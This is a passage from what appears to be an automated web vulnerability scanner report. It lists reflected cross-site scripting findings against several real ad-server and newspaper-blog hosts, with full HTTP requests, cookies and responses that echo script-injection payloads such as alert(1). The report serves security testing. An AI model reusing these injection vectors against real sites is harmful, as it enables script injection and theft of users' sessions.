P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 366
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TrafficMarketplaceB3/ATTW/1H_11Q1e043d"><script>alert(1)</script>d97c917261a/RON1HCPC/300/1322201168/x90/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

1.104. http://b3.mookie1.com/2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 340af"><script>alert(1)</script>fde4b5f29d6 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC340af"><script>alert(1)</script>fde4b5f29d6/300/1499044944143599616@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://media.adfrontiers.com/pq?t=f&s=530&ts=1297650508738&cm=191&ac=5&at=2&xvk=94178592.26350212&fd=t&tc=1&rr=t
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; ATTWL=CollectiveB3; other_20110126=set; dlx_XXX=set; NXCLICK2=011Pnu1BNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_I_SOH/1x1/11297434639.7437!y!B3!CXJ!EVR; RMFM=011PoJwiD102PB|B106w2|R106y5|D10C7a|D10CEj|T10CXJ|U10Dil; NSC_o4efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660; FarmersBranding=RocketFuelB3; id=914803576615380; session=1297647384|1297647384

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 02:29:24 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 365
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC340af"><script>alert(1)</script>fde4b5f29d6/300/423184803/x90/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

1.105. http://b3.mookie1.com/2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90 [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1b98"><script>alert(1)</script>b58eeecf04b was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300a1b98"><script>alert(1)</script>b58eeecf04b/1499044944143599616@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://media.adfrontiers.com/pq?t=f&s=530&ts=1297650508738&cm=191&ac=5&at=2&xvk=94178592.26350212&fd=t&tc=1&rr=t
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; ATTWL=CollectiveB3; other_20110126=set; dlx_XXX=set; NXCLICK2=011Pnu1BNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_I_SOH/1x1/11297434639.7437!y!B3!CXJ!EVR; RMFM=011PoJwiD102PB|B106w2|R106y5|D10C7a|D10CEj|T10CXJ|U10Dil; NSC_o4efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660; FarmersBranding=RocketFuelB3; id=914803576615380; session=1297647384|1297647384

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 02:29:26 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 365
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300a1b98"><script>alert(1)</script>b58eeecf04b/757931301/x90/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

1.106. http://b3.mookie1.com/2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90 [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x90

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e8d6"><script>alert(1)</script>9f9e61b8a83 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/1499044944143599616@x904e8d6"><script>alert(1)</script>9f9e61b8a83 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://media.adfrontiers.com/pq?t=f&s=530&ts=1297650508738&cm=191&ac=5&at=2&xvk=94178592.26350212&fd=t&tc=1&rr=t
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; ATTWL=CollectiveB3; other_20110126=set; dlx_XXX=set; NXCLICK2=011Pnu1BNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_I_SOH/1x1/11297434639.7437!y!B3!CXJ!EVR; RMFM=011PoJwiD102PB|B106w2|R106y5|D10C7a|D10CEj|T10CXJ|U10Dil; NSC_o4efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660; FarmersBranding=RocketFuelB3; id=914803576615380; session=1297647384|1297647384

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 02:29:28 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 357
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TrafficMarketplaceB3/ATTW/1H_11Q1/RON1HCPC/300/801120019/x904e8d6"><script>alert(1)</script>9f9e61b8a83/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

1.107. http://bid.openx.net/json [c parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bid.openx.net
Path:	/json

Issue detail

The value of the c request parameter is copied into the HTML document as plain text between tags. The payload 8223a<script>alert(1)</script>b163a0573ec was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /json?c=OXM_425158943748223a<script>alert(1)</script>b163a0573ec&pid=3a257c12-87aa-4e92-af61-e47d5422d9f7&s=160x600&f=1&cid=oxpv1%3A34-632-1929-1419-4033&hrid=02e3d43e8047564dc7fdfdccc682e0aa-1297647245&url=http%3A%2F%2Fadserver.adtechus.com%2Fadiframe%2F3.0%2F5235%2F1131606%2F0%2F154%2FADTECH%3Bcookie%3Dinfo%3Btarget%3D_blank%3Bkey%3Dkey1%2Bkey2%2Bkey3%2Bkey4%3Bgrp%3D000001 HTTP/1.1
Host: bid.openx.net
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x2ff8ff.js&size_id=9&account_id=6005&site_id=12414&size=160x60
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: p=1297527888; fc=H4sIAAAAAAAAAONlYOTgYWBgYGRg0GlkYAAA0iY5Vg8AAAA=; _wc[1297527893965]=H4sIAAAAAAAAAONgYGRg0GnkYGBiYOiq5WBgZmAozGQAAHz1QNYWAAAA; i=8e1bb757-a622-431b-967f-869e18a071fe

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=iso-8859-1
Cache-Control: no-cache, must-revalidate
P3P: CP="CUR ADM OUR NOR STA NID"
Connection: close
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Set-Cookie: s=a5f1e488-0086-4735-aa4d-21bbfb1228f5; version=1; path=/; domain=.openx.net;
Set-Cookie: p=1297647248; version=1; path=/; domain=.openx.net; max-age=63072000;
Set-Cookie: _wc[1297527893965]=; version=1; path=/; domain=.openx.net; max-age=0;
Set-Cookie: fc=H4sIAAAAAAAAAONlYOTgYWBgYGRg0GlkYAAA0iY5Vg8AAAA=; version=1; path=/; domain=.openx.net; max-age=31536000;

OXM_425158943748223a<script>alert(1)</script>b163a0573ec({"r":null});

1.108. http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blogs.desmoinesregister.com
Path:	/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba9f3"><script>alert(1)</script>2ae6c40c144 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dmrba9f3"><script>alert(1)</script>2ae6c40c144/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/ HTTP/1.1
Host: blogs.desmoinesregister.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 14 Feb 2011 01:35:19 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Cache-Control: must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 69963

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">

<head>
<title>Error | The Des Moines Register | DesMoinesRegister.com </title
...[SNIP]...
<link rel="canonical" href="http://blogs.desmoinesregister.com/dmrba9f3"><script>alert(1)</script>2ae6c40c144/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/" />
...[SNIP]...

1.109. http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blogs.desmoinesregister.com
Path:	/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 52d0a"%3balert(1)//c81c644a5e5 was submitted in the REST URL parameter 1. This input was echoed as 52d0a";alert(1)//c81c644a5e5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dmr52d0a"%3balert(1)//c81c644a5e5/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/ HTTP/1.1
Host: blogs.desmoinesregister.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 14 Feb 2011 01:35:23 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Cache-Control: must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 69887

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">

<head>
<title>Error | The Des Moines Register | DesMoinesRegister.com </title
...[SNIP]...

       depends: ['social.pluck.api'],
       requires:[],
       type: 'script'}
   );
})();
/*GO4 Faster Semantics*/
   GEL.thepage.pageinfo.semantics={
   response:{"Url":"http://blogs.desmoinesregister.com/dmr52d0a";alert(1)//c81c644a5e5/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/","ContentLength":0,"FetchDuration":5100,"ContentType":"","Id":0,"PathIds":0,"LanguageId":"","Channels":[],"UnconStatu
...[SNIP]...

1.110. http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blogs.desmoinesregister.com
Path:	/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6faae"%3balert(1)//4cf314e0707 was submitted in the REST URL parameter 2. This input was echoed as 6faae";alert(1)//4cf314e0707 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dmr/index.php6faae"%3balert(1)//4cf314e0707/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/ HTTP/1.1
Host: blogs.desmoinesregister.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 14 Feb 2011 01:36:04 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Cache-Control: must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 69887

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">

<head>
<title>Error | The Des Moines Register | DesMoinesRegister.com </title
...[SNIP]...
s: ['social.pluck.api'],
       requires:[],
       type: 'script'}
   );
})();
/*GO4 Faster Semantics*/
   GEL.thepage.pageinfo.semantics={
   response:{"Url":"http://blogs.desmoinesregister.com/dmr/index.php6faae";alert(1)//4cf314e0707/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/","ContentLength":0,"FetchDuration":5100,"ContentType":"","Id":0,"PathIds":0,"LanguageId":"","Channels":[],"UnconStatus":9},
   s
...[SNIP]...

1.111. http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blogs.desmoinesregister.com
Path:	/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de38b"><script>alert(1)</script>874a658779c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dmr/index.phpde38b"><script>alert(1)</script>874a658779c/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/ HTTP/1.1
Host: blogs.desmoinesregister.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 14 Feb 2011 01:36:00 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Cache-Control: must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 69963

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">

<head>
<title>Error | The Des Moines Register | DesMoinesRegister.com </title
...[SNIP]...
<link rel="canonical" href="http://blogs.desmoinesregister.com/dmr/index.phpde38b"><script>alert(1)</script>874a658779c/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/" />
...[SNIP]...

1.112. http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blogs.desmoinesregister.com
Path:	/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ecfa6</script><script>alert(1)</script>3132b775423 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/?ecfa6</script><script>alert(1)</script>3132b775423=1 HTTP/1.1
Host: blogs.desmoinesregister.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:35:15 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Vary: Cookie,Accept-Encoding,User-Agent
X-Pingback: http://blogs.desmoinesregister.com/dmr/xmlrpc.php
Link: <http://blogs.desmoinesregister.com/dmr/?p=110113>; rel=shortlink
Cache-Control: must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 104095

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:pas>

<head>
<title>Daniels at CPAC calls for
...[SNIP]...
oad, civil, conservative coalition « Des Moines Register Staff Blogs",
   type:"article",
   articleinturl: "/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/?ecfa6</script><script>alert(1)</script>3132b775423=1",
   categorymain:"News",
   categoryname:"News",
   categoryid:"NEWS",
   pluckpage: 0,
   url: {
       hostname: "blogs.desmoinesregister.com",
       domainname: "DesMoinesRegister.com",
       domainroot: "Des
...[SNIP]...

1.113. http://blogs.desmoinesregister.com/dmr/wp-content/plugins/audio-player/assets/audio-player.js [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blogs.desmoinesregister.com
Path:	/dmr/wp-content/plugins/audio-player/assets/audio-player.js

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52af9"><script>alert(1)</script>873102b4d8f was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dmr/wp-content/plugins/audio-player/assets/audio-player.js52af9"><script>alert(1)</script>873102b4d8f?ver=2.0.4.1 HTTP/1.1
Host: blogs.desmoinesregister.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 14 Feb 2011 01:34:54 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Cache-Control: must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 69523

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">

<head>
<title>Error | The Des Moines Register | DesMoinesRegister.com </title
...[SNIP]...
<link rel="canonical" href="http://blogs.desmoinesregister.com/dmr/wp-content/plugins/audio-player/assets/audio-player.js52af9"><script>alert(1)</script>873102b4d8f" />
...[SNIP]...

1.114. http://blogs.desmoinesregister.com/dmr/wp-content/plugins/audio-player/assets/audio-player.js [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blogs.desmoinesregister.com
Path:	/dmr/wp-content/plugins/audio-player/assets/audio-player.js

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fa9ca"%3balert(1)//678e5566e0f was submitted in the REST URL parameter 6. This input was echoed as fa9ca";alert(1)//678e5566e0f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dmr/wp-content/plugins/audio-player/assets/audio-player.jsfa9ca"%3balert(1)//678e5566e0f?ver=2.0.4.1 HTTP/1.1
Host: blogs.desmoinesregister.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 14 Feb 2011 01:35:05 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Cache-Control: must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 69785

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">

<head>
<title>Error | The Des Moines Register | DesMoinesRegister.com </title
...[SNIP]...
type: 'script'}
   );
})();
/*GO4 Faster Semantics*/
   GEL.thepage.pageinfo.semantics={
   response:{"Url":"http://blogs.desmoinesregister.com/dmr/wp-content/plugins/audio-player/assets/audio-player.jsfa9ca";alert(1)//678e5566e0f","ContentLength":0,"FetchDuration":5100,"ContentType":"","Id":0,"PathIds":0,"LanguageId":"","Channels":[],"UnconStatus":9},
   source:'CW',
   enabled:true,
   status:'',
   url:'http://cx.contextweb.com/
...[SNIP]...

1.115. http://blogs.desmoinesregister.com/dmr/wp-content/plugins/dmr-tweets/jquery.tweet.js [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blogs.desmoinesregister.com
Path:	/dmr/wp-content/plugins/dmr-tweets/jquery.tweet.js

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 33e51"%3balert(1)//000cbdc337f was submitted in the REST URL parameter 5. This input was echoed as 33e51";alert(1)//000cbdc337f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dmr/wp-content/plugins/dmr-tweets/jquery.tweet.js33e51"%3balert(1)//000cbdc337f?ver=3.0.4 HTTP/1.1
Host: blogs.desmoinesregister.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 14 Feb 2011 01:35:04 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Cache-Control: must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 69745

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">

<head>
<title>Error | The Des Moines Register | DesMoinesRegister.com </title
...[SNIP]...
s:[],
       type: 'script'}
   );
})();
/*GO4 Faster Semantics*/
   GEL.thepage.pageinfo.semantics={
   response:{"Url":"http://blogs.desmoinesregister.com/dmr/wp-content/plugins/dmr-tweets/jquery.tweet.js33e51";alert(1)//000cbdc337f","ContentLength":0,"FetchDuration":5100,"ContentType":"","Id":0,"PathIds":0,"LanguageId":"","Channels":[],"UnconStatus":9},
   source:'CW',
   enabled:true,
   status:'',
   url:'http://cx.contextweb.com/
...[SNIP]...

1.116. http://blogs.desmoinesregister.com/dmr/wp-content/plugins/dmr-tweets/jquery.tweet.js [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blogs.desmoinesregister.com
Path:	/dmr/wp-content/plugins/dmr-tweets/jquery.tweet.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3b42"><script>alert(1)</script>3113957a202 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dmr/wp-content/plugins/dmr-tweets/jquery.tweet.jsc3b42"><script>alert(1)</script>3113957a202?ver=3.0.4 HTTP/1.1
Host: blogs.desmoinesregister.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 14 Feb 2011 01:34:53 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Cache-Control: must-revalidate
Content-Type: text/html; charset=UTF-8
